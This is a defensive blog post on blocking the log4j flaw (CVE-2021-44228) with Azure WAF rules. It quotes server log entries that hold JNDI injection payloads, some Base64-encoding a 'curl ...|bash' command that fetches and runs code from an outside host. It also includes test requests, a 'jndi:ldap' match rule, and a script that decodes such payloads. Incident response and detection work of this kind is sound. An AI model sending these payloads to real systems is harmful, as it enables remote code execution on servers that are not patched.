How to take countermeasures against the log4j vulnerability (CVE-2021-44228) on Azure WAF.

Introduction

This article describes one countermeasure for the log4j vulnerability (CVE-2021-44228) in Azure.
The proper fix is to update the software; what is described here is only a temporary measure.
Until the update is done, a managed rule in Azure WAF can be used to block the attack.

I will not describe how to use services such as Azure WAF here.
Please understand that I am not a security expert.

These are the entries left in the server logs this time (some IPs have been masked).
The Base64 segment decodes to curl {IP}|bash, i.e. the request is trying to make the server execute a command.

45.153.xxx.xxx - - [10/Dec/2021:21:03:35 +0900] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://9f07e758d269.bingsearxxxxxx.com:39356/a}"
45.155.xxx.xxx - - [10/Dec/2021:22:00:41 +0900] "GET / HTTP/1.1" 301 531 "-" "${jndi:ldap://45.155.xxx.xxx:12344/Basic/Command/Base64/KGN1cmwgAASFoyaSsSO1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo4MCl8YmFzaA==}"
45.155.xxx.xxx - - [10/Dec/2021:23:40:59 +0900] "GET / HTTP/1.1" 301 5368 "-" "${jndi:ldap://45.155.xxx.xxx:12344/Basic/Command/Base64/KGN1cmwgAASFoyaSsSO1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTMuNzguMjguMTY6NDQzKXxiYXNo}"
45.155.xxx.xxx - - [10/Dec/2021:23:41:02 +0900] "GET / HTTP/1.1" 200 35233 "https://13.78.xxx.xxx:443/" "${jndi:ldap://45.155.xxx.xxx3:12344/Basic/Command/Base64/KGN1cmwgAASFoyaSsSO1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTMuNzguMjguMTY6NDQzKXxiYXNo}"
45.155.xxx.xxx - - [11/Dec/2021:03:12:42 +0900] "GET / HTTP/1.1" 301 531 "-" "${jndi:ldap://45.155.xxx.xxx:12344/Basic/Command/Base64/KGN1cmwgAASFoyaSsSO1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo4MCl8YmFzaA==}"
45.155.xxx.xxx - - [11/Dec/2021:04:20:42 +0900] "GET / HTTP/1.1" 301 5368 "-" "${jndi:ldap://45.155.xxx.xxx:12344/Basic/Command/Base64/KGN1cmwgAASFoyaSsSO1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTMuNzguMjguMTY6NDQzKXxiYXNo}"
45.155.xxx.xxx - - [11/Dec/2021:04:20:46 +0900] "GET / HTTP/1.1" 200 35240 "https://13.78.xxx.xxx:443/" "${jndi:ldap://45.155.xxx.xxx:12344/Basic/Command/Base64/KGN1cmwgAASFoyaSsSO1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTMuNzguMjguMTY6NDQzKXxiYXNo}"

[Update 12/15/2021]

Front Door blocks it with its default managed rules, under rule 944240 "Remote Command Execution".

# curl -ks -I https://fdlog4j.azurefd.net  -H 'User-Agent: ${jndi:ldap://TESTURL}'
HTTP/2 403
x-azure-ref: 0tW25YQAAAACD1AdpuBODQYOGiLvMlvurVFlPMDFFREdFMjMwOQBjNmUzMjgyMy02OGQxLTRjYzUtYmQ5My00NmYxODM5Y2JhZDE=
date: Wed, 15 Dec 2021 04:23:17 GMT

[Update 12/16/2021]

The managed rules of Application Gateway now appear to cover it in the Japan East region as well.
The custom rule below is therefore no longer required.
Set custom rules only when you need more granular, individual measures.

# curl -ks -I https://20.1xx.xxx.41 -H 'User-Agent: ${jndi:ldap://TESTURL}'
HTTP/1.1 403 Forbidden
Server: Microsoft-Azure-Application-Gateway/v2
Date: Wed, 15 Dec 2021 16:40:54 GMT
Content-Type: text/html
Content-Length: 179
Connection: keep-alive

Custom rule creation

This attack carries the string jndi:ldap in the User-Agent header, so a rule that matches on that string is enough to block it.
However, additional rules may be needed as new information about the attack emerges.

Custom Rule Name: any name
Priority: any priority

Match type: String
Match Variables: RequestHeaders
Header Name: User-Agent
Operation: is
Operator: Contains
Match Values: jndi:ldap

Apply the above rules.
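As an added example (not part of the original post), here is a small triage script for access logs in the format shown above. It extracts the JNDI callback host, decodes the Base64 command segment the article mentions, and reports whether the User-Agent "Contains jndi:ldap" custom rule would have matched the request; the sample lines are constructed with TEST-NET addresses, and the second one places the lookup in the Referer field to show what a User-Agent-only rule does not cover.

```python
import base64
import re
from typing import Optional

# Apache "combined" log format, as in the excerpt above:
# client ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The literal lookup form seen in those logs: ${jndi:<scheme>://<host>/<path>}
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/}]+)/(?P<path>[^}]*)\}")
# The article's custom rule: RequestHeaders / User-Agent / Contains "jndi:ldap"
UA_RULE_VALUE = "jndi:ldap"


def decode_b64_command(path: str) -> Optional[str]:
    """Decode the /Base64/<blob> segment of the JNDI path, or None if absent or invalid."""
    m = re.search(r"/Base64/([A-Za-z0-9+/=]+)", path)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError
        return None


def triage_line(line: str) -> Optional[dict]:
    """Flag a log line whose request, referer or user-agent carries a JNDI lookup."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    for field in ("request", "referer", "ua"):
        j = JNDI_RE.search(m.group(field))
        if j:
            return {
                "client": m.group("ip"),
                "field": field,
                "scheme": j.group("scheme"),
                "callback": j.group("host"),
                "command": decode_b64_command(j.group("path")),
                # Would the article's User-Agent "Contains jndi:ldap" rule have blocked it?
                "ua_rule_hits": UA_RULE_VALUE in m.group("ua"),
            }
    return None


# Constructed sample lines (TEST-NET addresses); the payload has the form the article describes.
_CMD_B64 = base64.b64encode(b"curl 203.0.113.10|bash").decode()
SAMPLE_LINES = [
    '198.51.100.7 - - [10/Dec/2021:21:03:35 +0900] "GET / HTTP/1.1" 301 512 "-" '
    '"${jndi:ldap://198.51.100.7:12344/Basic/Command/Base64/' + _CMD_B64 + '}"',
    # lookup in the Referer with a normal User-Agent: outside the scope of the UA-only rule
    '198.51.100.8 - - [10/Dec/2021:21:05:00 +0900] "GET / HTTP/1.1" 200 35233 '
    '"${jndi:ldap://198.51.100.8:1389/a}" "Mozilla/5.0"',
    '192.0.2.5 - - [10/Dec/2021:21:06:10 +0900] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in filter(None, map(triage_line, SAMPLE_LINES)):
        print(hit)
```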

In this case, we have enabled WAF for the Application Gateway and used the server of this blog as the backend.

Check

Prevention mode
# curl -ks -I https://level69.net -H 'User-Agent: ${jndi:ldap://TESTURL}'
HTTP/1.1 403 Forbidden
Server: Microsoft-Azure-Application-Gateway/v2
Date: Sat, 11 Dec 2021 07:55:13 GMT
Content-Type: text/html
Content-Length: 179
Connection: keep-alive

Detection mode

# curl -ks -I https://level69.net  -H 'User-Agent: ${jndi:ldap://TESTURL}'
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2021 07:56:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding

In Prevention mode, you can see that the Application Gateway rejects the request with 403, while in Detection mode the request reaches the Apache backend and returns 200.

Conclusion

For the log4j vulnerability (CVE-2021-44228), we recommend updating the software.
However, if you need a temporary measure in an existing environment, WAF is also effective.

Jun Kudo

I’m Japanese, Microsoft MVP for Azure. Alibaba Cloud MVP. Cloud Solution Architect. Azure, AWS, GCP, and Alibaba Cloud. https://twitter.com/jkudo